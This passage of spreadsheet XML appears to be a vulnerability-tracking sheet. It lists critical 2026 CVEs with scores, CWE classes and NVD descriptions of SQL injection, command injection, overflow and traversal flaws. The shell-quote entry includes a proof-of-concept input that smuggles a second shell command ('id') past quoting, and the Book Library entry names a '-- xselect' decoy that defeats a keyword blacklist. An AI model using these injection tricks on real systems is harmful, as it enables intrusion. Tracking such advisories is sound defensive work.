          <t>An unauthenticated update of public UI settings could be used by remote attackers to execute a stored cross-site scripting attack in the Rancher UI, in SUSE Rancher 2.15 before 2.15.2, 2.14 before 2.14.6, 2.13 before 2.13.10, 2.12 before 2.12.14 and 2.11 before 2.11.18.</t>
        </is>
      </c>
      <c r="T16" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-88804</t>
        </is>
      </c>
    </row>
    <row r="17">
      <c r="A17" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B17" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C17" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-19759</t>
        </is>
      </c>
      <c r="D17" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E17" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F17" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G17" s="5" t="inlineStr"/>
      <c r="H17" s="5" t="inlineStr"/>
      <c r="I17" s="5" t="inlineStr"/>
      <c r="J17" s="5" t="inlineStr">
        <is>
          <t>go</t>
        </is>
      </c>
      <c r="K17" s="5" t="inlineStr"/>
      <c r="L17" s="5" t="inlineStr"/>
      <c r="M17" s="5" t="inlineStr"/>
      <c r="N17" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P17" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q17" s="5" t="inlineStr"/>
      <c r="R17" s="5" t="inlineStr">
        <is>
          <t>CWE-863</t>
        </is>
      </c>
      <c r="S17" s="5" t="inlineStr">
        <is>
          <t>An Incorrect Authorization vulnerability in the task configuration in Google Cloud Application Integration versions prior to 2026-06-17 on Google Cloud Platform allows an authenticated Google Cloud user to execute arbitrary internal RPCs from inside Google's production network under a privileged identity using an internal-only task type.
This vulnerability was patched on 17 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T17" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-19759</t>
        </is>
      </c>
    </row>
    <row r="18">
      <c r="A18" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B18" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C18" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-81867</t>
        </is>
      </c>
      <c r="D18" s="5" t="n">
        <v>9.4</v>
      </c>
      <c r="E18" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F18" s="5" t="inlineStr">
        <is>
          <t>f45cbf4e-4146-4068-b7e1-655ffc2c548c</t>
        </is>
      </c>
      <c r="G18" s="5" t="inlineStr"/>
      <c r="H18" s="5" t="inlineStr"/>
      <c r="I18" s="5" t="inlineStr"/>
      <c r="J18" s="5" t="inlineStr">
        <is>
          <t>go, rust</t>
        </is>
      </c>
      <c r="K18" s="5" t="inlineStr"/>
      <c r="L18" s="5" t="inlineStr"/>
      <c r="M18" s="5" t="inlineStr"/>
      <c r="N18" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P18" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q18" s="5" t="inlineStr"/>
      <c r="R18" s="5" t="inlineStr">
        <is>
          <t>CWE-502</t>
        </is>
      </c>
      <c r="S18" s="5" t="inlineStr">
        <is>
          <t>A Deserialization of Untrusted Data vulnerability in the JavaScript Task in Google Cloud Application Integration versions prior to 2026-06-28 on Google Cloud Platform allows an authenticated user with standard permissions to run arbitrary code on the shared production servers using a specially crafted script bypassing param guards.
This vulnerability was patched on 28 June 2026, and no customer action is needed.</t>
        </is>
      </c>
      <c r="T18" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-81867</t>
        </is>
      </c>
    </row>
    <row r="19">
      <c r="A19" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B19" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C19" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-100752</t>
        </is>
      </c>
      <c r="D19" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E19" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F19" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G19" s="5" t="inlineStr"/>
      <c r="H19" s="5" t="inlineStr"/>
      <c r="I19" s="5" t="inlineStr"/>
      <c r="J19" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K19" s="5" t="inlineStr"/>
      <c r="L19" s="5" t="inlineStr"/>
      <c r="M19" s="5" t="inlineStr"/>
      <c r="N19" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P19" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q19" s="5" t="inlineStr"/>
      <c r="R19" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S19" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Real Estate Manager (Free) &lt; 6.7.9 - site/realestatemanager.php builds the ORDER BY clause of three separate frontend property-listing queries (category browsing, search results, and the full property listing) from a request-controlled order_field parameter, concatenated directly into an unquoted SQL clause with no allow-list of real column names and no cast.</t>
        </is>
      </c>
      <c r="T19" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-100752</t>
        </is>
      </c>
    </row>
    <row r="20">
      <c r="A20" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B20" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C20" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101039</t>
        </is>
      </c>
      <c r="D20" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E20" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F20" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G20" s="5" t="inlineStr"/>
      <c r="H20" s="5" t="inlineStr"/>
      <c r="I20" s="5" t="inlineStr"/>
      <c r="J20" s="5" t="inlineStr"/>
      <c r="K20" s="5" t="inlineStr"/>
      <c r="L20" s="5" t="inlineStr"/>
      <c r="M20" s="5" t="inlineStr"/>
      <c r="N20" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P20" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q20" s="5" t="inlineStr"/>
      <c r="R20" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S20" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was identified in FAST FAC1900R 20190827_2.0.2. Affected by this issue is the function copy_msg_element of the component devdiscover Service. Such manipulation leads to stack-based buffer overflow. The attack can be executed remotely. The exploit is publicly available and might be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T20" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101039</t>
        </is>
      </c>
    </row>
    <row r="21">
      <c r="A21" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B21" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C21" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101075</t>
        </is>
      </c>
      <c r="D21" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E21" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F21" s="5" t="inlineStr">
        <is>
          <t>cna@vuldb.com</t>
        </is>
      </c>
      <c r="G21" s="5" t="inlineStr"/>
      <c r="H21" s="5" t="inlineStr"/>
      <c r="I21" s="5" t="inlineStr"/>
      <c r="J21" s="5" t="inlineStr"/>
      <c r="K21" s="5" t="inlineStr"/>
      <c r="L21" s="5" t="inlineStr"/>
      <c r="M21" s="5" t="inlineStr"/>
      <c r="N21" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P21" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q21" s="5" t="inlineStr"/>
      <c r="R21" s="5" t="inlineStr">
        <is>
          <t>CWE-77, CWE-78</t>
        </is>
      </c>
      <c r="S21" s="5" t="inlineStr">
        <is>
          <t>A security vulnerability has been detected in Netcore NR289-GE 1.4.5102. The impacted element is the function system of the file /location_time.cgi of the component Location Time Handler. The manipulation of the argument mac leads to os command injection. Remote exploitation of the attack is possible. The exploit has been disclosed publicly and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T21" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101075</t>
        </is>
      </c>
    </row>
    <row r="22">
      <c r="A22" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B22" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C22" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101108</t>
        </is>
      </c>
      <c r="D22" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E22" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F22" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G22" s="5" t="inlineStr"/>
      <c r="H22" s="5" t="inlineStr"/>
      <c r="I22" s="5" t="inlineStr"/>
      <c r="J22" s="5" t="inlineStr">
        <is>
          <t>php, go, hp</t>
        </is>
      </c>
      <c r="K22" s="5" t="inlineStr"/>
      <c r="L22" s="5" t="inlineStr"/>
      <c r="M22" s="5" t="inlineStr"/>
      <c r="N22" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P22" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q22" s="5" t="inlineStr"/>
      <c r="R22" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S22" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Vehicle Manager (Free) &lt; 6.5.8 - site/vehiclemanager.php reads the order_field and order_direction sort parameters at three separate anonymous-reachable frontend entry points (category listing, search, and the all-vehicles listing) through a sanitizing function that applies real escaping, but the value is then placed into an unquoted ORDER BY clause, where escaping has no protective effect.</t>
        </is>
      </c>
      <c r="T22" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101108</t>
        </is>
      </c>
    </row>
    <row r="23">
      <c r="A23" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B23" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C23" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101110</t>
        </is>
      </c>
      <c r="D23" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E23" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F23" s="5" t="inlineStr">
        <is>
          <t>security@joomla.org</t>
        </is>
      </c>
      <c r="G23" s="5" t="inlineStr"/>
      <c r="H23" s="5" t="inlineStr"/>
      <c r="I23" s="5" t="inlineStr"/>
      <c r="J23" s="5" t="inlineStr">
        <is>
          <t>php, hp</t>
        </is>
      </c>
      <c r="K23" s="5" t="inlineStr"/>
      <c r="L23" s="5" t="inlineStr"/>
      <c r="M23" s="5" t="inlineStr"/>
      <c r="N23" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P23" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q23" s="5" t="inlineStr"/>
      <c r="R23" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S23" s="5" t="inlineStr">
        <is>
          <t>Joomla Extension - ordasoft.com - Unauthenticated SQL Injection in Book Library (Free) &lt; 6.4.6 - site/booklibrary.php’s books() function reads the field and direction request parameters and passes each through a function called protectInjectionWithoutQuote(), whose only real protection is a keyword blacklist that, on detecting the literal substring select, wraps the value in $db-&gt;quote() instead of rejecting it. The value is then concatenated directly into an unquoted ORDER BY clause, a position where quoting provides no protection at all. Reaching the vulnerable code path requires two conditions: a first request to prime session-stored sort defaults, and a trailing decoy comment (-- xselect) that satisfies the blacklist’s substring check without altering the payload’s effect.</t>
        </is>
      </c>
      <c r="T23" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101110</t>
        </is>
      </c>
    </row>
    <row r="24">
      <c r="A24" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B24" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C24" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101891</t>
        </is>
      </c>
      <c r="D24" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E24" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F24" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G24" s="5" t="inlineStr"/>
      <c r="H24" s="5" t="inlineStr"/>
      <c r="I24" s="5" t="inlineStr"/>
      <c r="J24" s="5" t="inlineStr"/>
      <c r="K24" s="5" t="inlineStr"/>
      <c r="L24" s="5" t="inlineStr"/>
      <c r="M24" s="5" t="inlineStr"/>
      <c r="N24" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P24" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q24" s="5" t="inlineStr"/>
      <c r="R24" s="5" t="inlineStr">
        <is>
          <t>CWE-284, CWE-923</t>
        </is>
      </c>
      <c r="S24" s="5" t="inlineStr">
        <is>
          <t>An improper access control vulnerability in an internal API service on WatchGuard Access Points allows an unauthenticated attacker with network access to the AP to obtain a valid API session.</t>
        </is>
      </c>
      <c r="T24" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101891</t>
        </is>
      </c>
    </row>
    <row r="25">
      <c r="A25" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B25" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C25" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73640</t>
        </is>
      </c>
      <c r="D25" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E25" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F25" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G25" s="5" t="inlineStr"/>
      <c r="H25" s="5" t="inlineStr"/>
      <c r="I25" s="5" t="inlineStr"/>
      <c r="J25" s="5" t="inlineStr"/>
      <c r="K25" s="5" t="inlineStr"/>
      <c r="L25" s="5" t="inlineStr"/>
      <c r="M25" s="5" t="inlineStr"/>
      <c r="N25" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P25" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q25" s="5" t="inlineStr"/>
      <c r="R25" s="5" t="inlineStr">
        <is>
          <t>CWE-89</t>
        </is>
      </c>
      <c r="S25" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Time Based-Blind SQL Injection in password recovery functionality. The unauthenticated attacker can prepare GET request with one of the parameters filled in with an arbitrary SQL query. The parameter is interpreted as part of SQL predicate resulting in Time-Based Blind SQL Injection.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T25" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73640</t>
        </is>
      </c>
    </row>
    <row r="26">
      <c r="A26" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B26" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C26" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-86102</t>
        </is>
      </c>
      <c r="D26" s="5" t="n">
        <v>9.300000000000001</v>
      </c>
      <c r="E26" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F26" s="5" t="inlineStr">
        <is>
          <t>5d1c2695-1a31-4499-88ae-e847036fd7e3</t>
        </is>
      </c>
      <c r="G26" s="5" t="inlineStr"/>
      <c r="H26" s="5" t="inlineStr"/>
      <c r="I26" s="5" t="inlineStr"/>
      <c r="J26" s="5" t="inlineStr"/>
      <c r="K26" s="5" t="inlineStr"/>
      <c r="L26" s="5" t="inlineStr"/>
      <c r="M26" s="5" t="inlineStr"/>
      <c r="N26" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P26" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q26" s="5" t="inlineStr"/>
      <c r="R26" s="5" t="inlineStr">
        <is>
          <t>CWE-78, CWE-863</t>
        </is>
      </c>
      <c r="S26" s="5" t="inlineStr">
        <is>
          <t>An OS command injection vulnerability in the WatchGuard AP internal API service allows an attacker with network access to the AP to execute arbitrary shell commands on the underlying operating system.</t>
        </is>
      </c>
      <c r="T26" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-86102</t>
        </is>
      </c>
    </row>
    <row r="27">
      <c r="A27" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B27" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C27" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-102422</t>
        </is>
      </c>
      <c r="D27" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E27" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F27" s="5" t="inlineStr">
        <is>
          <t>7ffcee3d-2c14-4c3e-b844-86c6a321a158</t>
        </is>
      </c>
      <c r="G27" s="5" t="inlineStr"/>
      <c r="H27" s="5" t="inlineStr"/>
      <c r="I27" s="5" t="inlineStr"/>
      <c r="J27" s="5" t="inlineStr">
        <is>
          <t>rust</t>
        </is>
      </c>
      <c r="K27" s="5" t="inlineStr"/>
      <c r="L27" s="5" t="inlineStr"/>
      <c r="M27" s="5" t="inlineStr"/>
      <c r="N27" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="P27" s="5" t="inlineStr">
        <is>
          <t>2026-09-29</t>
        </is>
      </c>
      <c r="Q27" s="5" t="inlineStr"/>
      <c r="R27" s="5" t="inlineStr">
        <is>
          <t>CWE-78</t>
        </is>
      </c>
      <c r="S27" s="5" t="inlineStr">
        <is>
          <t>shell-quote's `quote()` function emits a `{ comment }` token as `#` followed by its text, which comments out the rest of the shell line, including the opening quote of any later string token. A line terminator (\n, \r, U+2028, U+2029) in that later string therefore ends the comment, and the rest of the string is parsed as shell input: `quote(['echo', 'ok', { comment: 'x' }, 'a\nid;#'])` runs `id` in sh, bash, dash, ksh and zsh. `parse()` emits a comment token for a `#` in the middle of a word (for example `http://example.com/#frag`), so callers that combine `parse()` output with another untrusted string, such as `quote(parse(untrustedCommand).concat(untrustedArg))`, are affected. The fix for CVE-2026-9277 rejected line terminators in the comment's own text, but not in the tokens after it. Fixed in 1.11.0: `quote()` throws a `TypeError` when a string after a `{ comment }` token contains a line terminator.</t>
        </is>
      </c>
      <c r="T27" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-102422</t>
        </is>
      </c>
    </row>
    <row r="28">
      <c r="A28" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B28" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C28" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-73642</t>
        </is>
      </c>
      <c r="D28" s="5" t="n">
        <v>9.199999999999999</v>
      </c>
      <c r="E28" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F28" s="5" t="inlineStr">
        <is>
          <t>cvd@cert.pl</t>
        </is>
      </c>
      <c r="G28" s="5" t="inlineStr"/>
      <c r="H28" s="5" t="inlineStr"/>
      <c r="I28" s="5" t="inlineStr"/>
      <c r="J28" s="5" t="inlineStr"/>
      <c r="K28" s="5" t="inlineStr"/>
      <c r="L28" s="5" t="inlineStr"/>
      <c r="M28" s="5" t="inlineStr"/>
      <c r="N28" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P28" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q28" s="5" t="inlineStr"/>
      <c r="R28" s="5" t="inlineStr">
        <is>
          <t>CWE-22</t>
        </is>
      </c>
      <c r="S28" s="5" t="inlineStr">
        <is>
          <t>Dayforce Payroll is vulnerable to Path Traversal  in file download functionality. An unauthenticated attacker can sent GET request with file path parameter set to any path including an absolute
local file path.
Because vendor contact attempts were unsuccessful, the vulnerability has only been confirmed in version R2026.2.0 but may also affect other versions.</t>
        </is>
      </c>
      <c r="T28" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-73642</t>
        </is>
      </c>
    </row>
    <row r="29">
      <c r="A29" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B29" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C29" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101081</t>
        </is>
      </c>
      <c r="D29" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E29" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G29" s="5" t="inlineStr"/>
      <c r="H29" s="5" t="inlineStr"/>
      <c r="I29" s="5" t="inlineStr"/>
      <c r="J29" s="5" t="inlineStr"/>
      <c r="K29" s="5" t="inlineStr"/>
      <c r="L29" s="5" t="inlineStr"/>
      <c r="M29" s="5" t="inlineStr"/>
      <c r="N29" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P29" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q29" s="5" t="inlineStr"/>
      <c r="R29" s="5" t="inlineStr">
        <is>
          <t>CWE-119, CWE-121</t>
        </is>
      </c>
      <c r="S29" s="5" t="inlineStr">
        <is>
          <t>A security flaw has been discovered in D-Link DI-8400 16.07. This vulnerability affects the function menu_nat_more_asp of the file menu_nat_more.asp of the component Web Administration Service. The manipulation of the argument opt results in stack-based buffer overflow. The attack can be launched remotely. The exploit has been released to the public and may be used for attacks.</t>
        </is>
      </c>
      <c r="T29" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101081</t>
        </is>
      </c>
    </row>
    <row r="30">
      <c r="A30" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B30" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C30" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101187</t>
        </is>
      </c>
      <c r="D30" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E30" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G30" s="5" t="inlineStr"/>
      <c r="H30" s="5" t="inlineStr"/>
      <c r="I30" s="5" t="inlineStr"/>
      <c r="J30" s="5" t="inlineStr"/>
      <c r="K30" s="5" t="inlineStr"/>
      <c r="L30" s="5" t="inlineStr"/>
      <c r="M30" s="5" t="inlineStr"/>
      <c r="N30" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P30" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q30" s="5" t="inlineStr"/>
      <c r="R30" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S30" s="5" t="inlineStr">
        <is>
          <t>A weakness has been identified in Ziroom ZHOME A0101 1.0.1.0. This vulnerability affects the function pop_usb_device of the file usr/lib/lua/luci/controller/api/zrUsb.lua of the component USB Device Management API. This manipulation of the argument path causes command injection. The attack is possible to be carried out remotely. The exploit has been made available to the public and could be used for attacks. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T30" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101187</t>
        </is>
      </c>
    </row>
    <row r="31">
      <c r="A31" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B31" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C31" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101260</t>
        </is>
      </c>
      <c r="D31" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E31" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="G31" s="5" t="inlineStr"/>
      <c r="H31" s="5" t="inlineStr"/>
      <c r="I31" s="5" t="inlineStr"/>
      <c r="J31" s="5" t="inlineStr">
        <is>
          <t>gin</t>
        </is>
      </c>
      <c r="K31" s="5" t="inlineStr"/>
      <c r="L31" s="5" t="inlineStr"/>
      <c r="M31" s="5" t="inlineStr"/>
      <c r="N31" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
      </c>
      <c r="O31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="P31" s="5" t="inlineStr">
        <is>
          <t>2026-09-28</t>
        </is>
      </c>
      <c r="Q31" s="5" t="inlineStr"/>
      <c r="R31" s="5" t="inlineStr">
        <is>
          <t>CWE-74, CWE-77</t>
        </is>
      </c>
      <c r="S31" s="5" t="inlineStr">
        <is>
          <t>A vulnerability was detected in Ziroom ZHOME A0101 1.0.1.0. Affected by this issue is some unknown functionality of the file /api/ZRnetwork/firstLogin. Performing a manipulation of the argument firstLogin results in command injection. The attack is possible to be carried out remotely. The exploit is now public and may be used. The vendor was contacted early about this disclosure but did not respond in any way.</t>
        </is>
      </c>
      <c r="T31" s="6" t="inlineStr">
        <is>
          <t>https://nvd.nist.gov/vuln/detail/CVE-2026-101260</t>
        </is>
      </c>
    </row>
    <row r="32">
      <c r="A32" s="5" t="inlineStr">
        <is>
          <t>P2 - High</t>
        </is>
      </c>
      <c r="B32" s="5" t="inlineStr">
        <is>
          <t>New</t>
        </is>
      </c>
      <c r="C32" s="5" t="inlineStr">
        <is>
          <t>CVE-2026-101261</t>
        </is>
      </c>
      <c r="D32" s="5" t="n">
        <v>9.1</v>
      </c>
      <c r="E32" s="5" t="inlineStr">
        <is>
          <t>CRITICAL</t>
        </is>
      </c>
      <c r="F32" s="5" t="inlineStr">
        <is>
          <t>NVD</t>
        </is>
